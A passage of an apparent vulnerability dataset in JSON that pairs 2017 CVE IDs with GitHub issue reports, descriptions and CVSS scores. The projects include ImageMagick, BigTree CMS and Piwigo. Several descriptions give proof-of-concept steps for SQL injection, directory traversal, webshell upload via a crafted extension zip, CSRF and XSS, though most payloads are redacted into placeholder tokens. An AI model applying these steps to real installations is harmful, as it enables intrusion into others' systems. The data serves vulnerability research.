        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG bc NUMBERTAG fb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG eb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9407",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/459",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/459",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-28T04:02:12Z",
        "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG f7b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f2c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9409",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/458",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/458",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-28T04:01:21Z",
        "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG d9 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b2c NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9416",
        "Issue_Url_old": "https://github.com/odoo/odoo/issues/17394",
        "Issue_Url_new": "https://github.com/odoo/odoo/issues/17394",
        "Repo_new": "odoo/odoo",
        "Issue_Created_At": "2017-06-02T23:38:19Z",
        "description": "reserved .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9427",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/288",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/288",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-03T12:03:16Z",
        "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG shou me the code: file PATHTAG APITAG continue the function APITAG file PATHTAG ERRORTAG here the $_POST[\"table\"] to $table to sqlescape($table)\uff0c final INSERT INTO database table bigtree_module_forms. continue file PATHTAG CODETAG continue\uff0c at APITAG function SELECT FROM bigtree_module_forms ERRORTAG at here, $admin APITAG to $modules to $m, final sqlquery(\"SELECT id FROM APITAG \") POC\uff1a one step\uff0ccreate module xfkxfk\uff0c on url\uff1a URLTAG two step\uff0c create module xfkxfk2\uff0cbut the table name is\uff1axfkxfk APITAG where NUMBERTAG and APITAG APITAG )\uff0c on url\uff1a URLTAG three step\uff0c request the url\uff0csql inject here\uff1a URLTAG email : EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9428",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/289",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/289",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-04T07:05:02Z",
        "description": "Directory Traversal in bigtreecms NUMBERTAG Directory Traversal in bigtreecms NUMBERTAG FILE: PATHTAG at here, just filter .. and /, but we can use \\ bypass on windows POC: > POST PATHTAG HTTP NUMBERTAG Host: localhost > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: text/html, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG > Accept Encoding: gzip, deflate > Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG > Referer: URLTAG > Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG hide_bigtree_bar= > Connection: keep alive > > PATHTAG email : EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9434",
        "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/414",
        "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/414",
        "Repo_new": "weidai11/cryptopp",
        "Issue_Created_At": "2017-05-10T21:00:45Z",
        "description": "Zinflate and APITAG finding. We started fuzzing library classes. Its dumb fuzzing, and all we do is generate a random string and send it into a filter like Inflator or ERRORTAG . It looks like Inflator is having some trouble. The assert below was added when we noticed some odd behavior. ERRORTAG Running under Address Sanitizer results in: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9439",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/460",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/460",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-28T04:02:49Z",
        "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d NUMBERTAG fcb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f3a3 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d0b0bb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9440",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/462",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/462",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-28T04:10:28Z",
        "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fcc6d NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG fcc NUMBERTAG adfd NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c6e1 in APITAG APITAG NUMBERTAG e7d1 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fcc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9441",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/290",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/290",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-05T08:32:27Z",
        "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Multiple Security Issue of XSS exists in APITAG CMS Less than NUMBERTAG file\uff1a ERRORTAG title\u3001version\u3001author_name not filter by APITAG function POC\uff1a in url\uff1a URLTAG upload FILETAG \uff0cthere is FILETAG in FILETAG ERRORTAG when upload xfkxfk.zip successful, result in a xss vuln (you can also build extensions, then download extensions, final modify extension and install it) FILETAG please use APITAG function to filter params~ thank you~ email \uff1a EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-9442",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/291",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/291",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-05T08:53:02Z",
        "description": "getshell in bigtreecms NUMBERTAG Multiple Security Issue of code execution exists in APITAG CMS Less than NUMBERTAG FILE\uff1a PATHTAG ERRORTAG we can upload a zip file which containing the PHP code\uff0c then Unpacked to PATHTAG POC NUMBERTAG build extension APITAG modules, templates, callouts, field types, feeds, and settings to your extension. APITAG additional files to your extension NUMBERTAG create extension NUMBERTAG download extension\uff08a zip file NUMBERTAG modify webshell content to php file in extension\uff08a zip file NUMBERTAG install extension NUMBERTAG the shell in PATHTAG FILETAG thank you~ email \uff1a EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9443",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/292",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/292",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-05T08:59:45Z",
        "description": "SQL code execution in bigtreecms NUMBERTAG Multiple Security Issue of SQL code execution exists in APITAG CMS Less than NUMBERTAG FILE\uff1a PATHTAG CODETAG continue APITAG function PATHTAG ERRORTAG Note here\uff1a > APITAG as $table_name => $sql_statement > sqlquery($sql_statement); we can execute any sql code at here",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9444",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/293",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/293",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-05T09:50:37Z",
        "description": "Multiple CSRF exists in APITAG CMS Less than NUMBERTAG Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG one with the name\u3001password\u3001company parameters to the PATHTAG poc, APITAG CODETAG request FILETAG then you will update developer user's profile. other csrf vuln: URLTAG URLTAG URLTAG repair you my be use APITAG function before do these. thank you ! email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9448",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/294",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/294",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-06T01:53:13Z",
        "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Cross site Scripting (XSS) in bigtreecms NUMBERTAG We can use low privileged\uff08 administrator\uff09 users to attack high privileged\uff08D eveloper\uff09 users POC NUMBERTAG add a administrator user NUMBERTAG login with user NUMBERTAG request URLTAG \uff0csave a published revisions\uff1a > POST PATHTAG HTTP NUMBERTAG Host: APITAG > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / > Accept Language: zh CN,zh; APITAG US; APITAG > Accept Encoding: gzip, deflate > Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG > Referer: URLTAG > Content Length NUMBERTAG Cookie: > Connection: keep alive > > APITAG > APITAG the param description have a xss vuln NUMBERTAG when the developer user login\uff0c and request\uff1a URLTAG the developer user will be xssed~",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-9449",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/295",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/295",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-06T02:46:27Z",
        "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG FILE\uff1a PATHTAG at first\uff0c Create the view APITAG then search the view PATHTAG CODETAG cointinue PATHTAG ERRORTAG here the var $view[\"table\"] have a sqli vuln",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9451",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/34",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/34",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2017-05-24T08:24:55Z",
        "description": "XSS Vulnerability in FILETAG on APITAG NUMBERTAG Title: XSS Vulnerability in FILETAG Security: Low (visit FILETAG as a administrator) Software: FILETAG Reproduce: (get client cookie information) URLTAG FILETAG reference about XSS: URLTAG url",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9452",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/667",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/667",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-05-04T02:12:31Z",
        "description": "Cross Site Scripting(XSS) in page parameter of FILETAG . Latest Version of piwigo is vulnerable to cross site scripting vulnerability in FILETAG , remote attacker may inject and execute arbitrary javascript via the page parameter. HTTP REQUEST: GET APITAG APITAG APITAG tcs7a HTTP NUMBERTAG Host NUMBERTAG APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG Connection: close Upgrade Insecure Requests NUMBERTAG RESPONSE: HTTP NUMBERTAG OK Date: Wed NUMBERTAG May NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Connection: close Content Type: text/html; charset=utf NUMBERTAG Content Length NUMBERTAG APITAG APITAG APITAG root APITAG APITAG APITAG APITAG \u6d4f\u89c8\u56fe\u5e93 APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG tcs7a&amp;change_theme NUMBERTAG class=\"tiptip\" title=\"\u66f4\u6539\u7ba1\u7406\u754c\u9762\u4e3a\u6e05\u723d\u6216\u8005\u70ab\u9ed1\u7684\u989c\u8272\"> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u5e2e\u52a9 APITAG APITAG APITAG APITAG APITAG APITAG \u6ce8\u9500 APITAG APITAG APITAG APITAG .......",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2017-9463",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/705",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/705",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-06-13T10:30:13Z",
        "description": "user list backend, check input parameter. To avoid any possible security issue, let's check the input parameters",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9464",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/706",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/706",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-06-14T08:11:25Z",
        "description": "[security] identification should redirect within Piwigo only. The APITAG system in FILETAG can lead to redirect outside Piwigo. On any location actually. To avoid any \"open redirect\" security issue, Piwigo should make sure the redirection occurs only with Piwigo, not outside.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9465",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/678",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/678",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2017-06-06T14:40:43Z",
        "description": "Invalid memory access (potential information disclosure) in APITAG Invalid memory access (potential information disclosure) in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9499",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/492",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/492",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-15T18:14:47Z",
        "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in pixel accessor.h. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9500",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/500",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/500",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-23T17:06:00Z",
        "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in profile.c. CODETAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9501",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/491",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/491",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-15T18:14:07Z",
        "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in semaphore.c. CODETAG testcase \uff1a URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9520",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7698",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7698",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-06-07T19:12:45Z",
        "description": "Use after free in APITAG Use after free in APITAG HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9527",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/3486",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/3486",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2017-03-07T18:22:46Z",
        "description": "Heap use after free in mark_context_stack. The following input to mruby demonstrates a heap use after free bug: FILETAG To demonstrate, build with clang & ASAN ( APITAG ) or use gcc & valgrind. ASAN report: ERRORTAG Valgrind report: ERRORTAG This issue was reported by URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-9546",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/298",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/298",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-08T11:33:52Z",
        "description": "Denial of Service in bigtreecms NUMBERTAG Hi, I found a denial of service vulnerability in bigtreecms NUMBERTAG The POC is below: Login with Administrator and edit a page,then add a revision,input APITAG FILETAG Then FILETAG And generate a wrong report, leak the source code,but you can\u2019t save resivion any more",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2017-9547",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/297",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/297",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-08T10:04:12Z",
        "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Hi, I found a cross site scripting vulnerability in bigtreecms NUMBERTAG The POC is below: Login with Administrator and Edit Page FILETAG then click save&preview FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-9548",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/296",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/296",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-08T05:19:59Z",
        "description": "Stored Cross site Scripting in bigtreecms NUMBERTAG Hi, I found a stored cross site scripting vulnerability in bigtreecms NUMBERTAG The POC is below: With Developer: Edit a page with Tempalte Home FILETAG With Administrator or Normal APITAG a Revision created in Previous step FILETAG FILETAG Click Overwrite,then click save&preview, FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-9609",
        "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/373",
        "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/373",
        "Repo_new": "blackcatdevelopment/blackcatcms",
        "Issue_Created_At": "2017-06-21T10:29:10Z",
        "description": "XSS in Blackcat cms NUMBERTAG Hello, I would like to report a vulnerability that I have found on Blackcat cms NUMBERTAG in which Cross Site Scripting(XSS) attack is possible. For details please go through attached document. Blackcat cms NUMBERTAG ss POC by Provensec FILETAG Regards, Faiz Ahmed Zaidi",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-9621",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/185",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/185",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-05-05T04:06:19Z",
        "description": "Stored Cross Site Scriping. PATHTAG code: APITAG poc: login >menu >language&translations >PHP environment check(all item) > ERRORTAG >confirm FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9622",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/186",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/186",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-05-05T06:32:58Z",
